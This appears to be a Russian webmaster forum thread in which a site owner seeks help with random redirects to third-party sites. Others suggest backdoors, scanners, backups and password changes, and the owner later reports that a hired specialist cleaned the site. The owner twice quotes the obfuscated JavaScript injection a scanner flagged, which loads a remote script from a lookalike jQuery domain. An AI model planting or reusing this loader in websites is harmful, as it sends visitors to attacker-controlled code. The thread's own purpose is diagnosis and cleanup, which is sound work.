Редирект на "левые" сайты. Где искать проблему?
Страницы: 1
Редирект на "левые" сайты. Где искать проблему?
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл  .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.

Бесплатная контекстная реклама

Тут глубже копать надо! Первый вопрос, который Вы должны себе задать: кто этот файлик  .htaccess подвравил до вас, что он стал редиректить на левые сайты, и каким образом это произошло. Причин может быть много. В любом случае такой симптом весьма тревожен. Я сталкивался пару раз с таким явлением и в моём случае  это был бэк дор и шелл вирусы. Что это за гадость и как с ней бороться почитайте в инете, инфы много. Лучше, конечно, специалисту по этим вопросам показаться. Свои сайты  я сам лечил, однако тут как в трипере. Не долечишь, и всё начинается снова))).
Цитата
Вадим Бардадым пишет:
иногда срабатывает переход на сторонние сайты
Иногда - это как? При каких условиях.
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Где отдохнуть? Куда поехать? Выбирай с нами
Цитата
Вадим Бардадым пишет:
Здравствуйте, мой сайт med-brand.ru. Когда открываю главную страницу или какую-либо ссылку с главной страницы, иногда срабатывает переход на сторонние сайты (например - simsimply.com и games-iso.com). Как устранить проблему? Слышал нужно править файл .htaccess, но что конкретно...раньше с этим не сталкивался...Спасибо за помощь.
Давай за 150р реши твои проблемы с сайтом.
<p>Туры в Карпаты - дешево</p>
Скайп art_dsugar.
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник: 

Код
<script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
 
Пробовали удалить его с Алексей SP ( www.cy-pr.com/forum/f80/t52000/#100941 ). Не получилось, может кто подскажет как удалить или человека, который поможет.
Цитата
Coder пишет:
Иногда - это как? При каких условиях.
Условий как-таковых и нет. Переходит 1 раз за 5 кликов (примерно), в основном с главной страницы...
Цитата
Вадим Бардадым пишет:
Цитата
Антон пишет:
Может быть вредоносный код, проверьте файлы на наличие какого-то "левого" кода.
Действительно, вот результаты сканирования - sitecheck.sucuri.net/scanner/?scan=med-brand.ruНа этот код ругается антивирусник:
Код
 <script type="text/javascript">var hs_frf=document.createElement('script');hs_frf.setAttribute("type","text/javascript");var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72\x79\x2E\x63\x6F\x6D\x2F\x63\x6F\x6D\x70\x61\x62\x69\x6C\x69\x74\x79\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");document.getElementsByTagName("head")[0].appendChild(hs_frf);</script> <script type="text/javascript"> 
  
Пробовали удалить его с Алексей SP [ www.cy-pr.com/forum/f80/t52000/#100941 ]. Не получилось, может кто подскажет как удалить или человека, который поможет.
Судя по коду у Вас полный триппер-букет в шаблоне WordPress ( wordpress.org/ )! Тут посмотрите: _www.site-security.ru/opisanie-raboty-skanera.html сканером. Sheel and Basic Backdoor Script Finder - в открытом доступе всем желающим можно скачать _www.site-security.ru/nash-pervyj-skaner.html
И следом почитать: _habrahabr.ru/company/sprinthost/blog/125839/ и взять на вооружение!
А откатить сайт из резервной копии не судьба? Вам за такие Редиректы Яндекс АГС воткнет... Ооо! И пароли смените после лечения!
Посмотреть конечно любопытно - пусть даже без денег! smile:)
ТС, то что у вас обнаружено может быть причной, но не источником заразы. Внешний не всегда можно что-либо сказать, поэтому внимательнее проверьте файлы сайта.
Если сами не справитесь стучите проверим сайт на все виды вирусов + дадим рекомендации!
Цитата
mylegnica пишет:
Судя по коду у Вас полный триппер-букет в шаблоне WordPress
У меня источником трипака явился тако же шаблон, только для Joomla. Частенько, если скачать шаблончик Бог весть откуда, можно намотать якусь гидоту.smile:) Два раза после лечения у меня случались рецидивы. Чуть до инфаркта не довели. Но когда на самом шаблоне нашёл замаскированный скрипт всё прекратилось.
ФУУУХ, НАКОНЕЦ!!!! Спасибо Всем кто участвовал, долго не мог удалить вредоносный код на сайте! После длительного поиска специалиста, нашел в сети Алексея ( skype - [SIZE=2]doktorsaitov)[/SIZE], Алексей справился с задачей на все 100%, проделал большую и кропотливую работу, источником заразы оказался плагин, причем были вкрапления в functions.php + пошел на встречу в плане цены, за что я ему очень благодарен! Рекомендую всем и буду обращаться сам!!!
Да...Кому нужна помощь, на этом форуме он находится по ссылке: www.cy-pr.com/people/114017/
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
11:16 Яндекс выдача 15.09.2019 
11:09 Ищу систему для оплаты на сайте 
07:25 Если украли статьи 
07:20 Lottery Partner в поиске партнеров! Самые высокие ставки! 
14:16 Edu-Revenue.com – партнёрка в нише эссе. До 75% за новые заказы, 35% – ребилы! 
12:06 Продвижение в ТОП Яндекс. Мега быстро! 
19:47 14 сентября 2019 Яндекс выдача 
11:10 Метод получения качественных ссылок за копейки (автоматизация 90%) 
10:31 Копирайтинг RU/EN, переводы высокого уровня (рус/англ/укр), SEO-оптимизированные тексты под ключ для выхода в Топ (2000+ отзывов) 
09:09 Продам сайт азартной тематики. 
08:59 Софт на заказ 
22:37 Белый вывод сайта в топ Яндекса 
22:01 Размещу 15001 ссылку на Ваш сайт с профилей + Бонус 
15:18 Программы для рассылок, накрутки, продвижения и ведения аккаунтов в skype, instagram, vk, ok, avito, lenta.ru 
12:13 Наши машинки 
04:54 Цель: 100 000 руб. в месяц с 1-го канала на Яндекс Дзен © БЛОГ НЕ БЛОГЕРА 
18:59 Свежие базы 2гис и Яндекс карты. за 2019 год 
17:29 Оптимизация шаблона: теги h3-h4 
17:20 Сайт с пометкой вредоносное ПО от гугла 
14:32 Партнерская программа Affiliates5plus с выплатами до 60% 
12:07 Кинотеатры онлайн - прямая реклама роликов ютуб, работает ли?